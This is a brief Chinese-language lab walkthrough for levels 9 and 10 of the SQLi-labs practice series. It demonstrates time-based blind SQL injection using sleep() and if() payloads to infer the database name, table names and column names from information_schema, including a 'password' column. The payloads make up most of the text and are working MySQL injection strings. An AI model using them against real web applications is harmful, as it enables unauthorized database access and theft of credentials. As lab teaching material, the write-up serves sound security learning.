SQLI DUMB SERIES-9&&10

第五关、第八关以及第九关、第十关都是使用盲注，除了第五关说的双注入外，也可使用时间注入法

(1)无论输入啥，都回显相同

（2）

?id=1' and sleep(3) --+

 发现有明显延迟，说明可以使用时间注入，

?id=1' and if(length(database())=8 , sleep(5), 1) --+

 从1尝试到8发现有明显延迟，说明数据库名为八位

（3）同样的爆库名

?id=1' and if(left(database(),1)='s' , sleep(5), 1) --+

?id=1' and if(left(database(),8)='security' , sleep(5), 1) --+

 继续尝试可得库名：security

（4）爆表名

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(5), 1) --+

 改变Limit的第一个参数可以得到所有表名。

（5）爆字段

?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 1,1),8)='password', sleep(5), 1) --+

 改变Limit的第一个参数可以得到user表中得所有字段。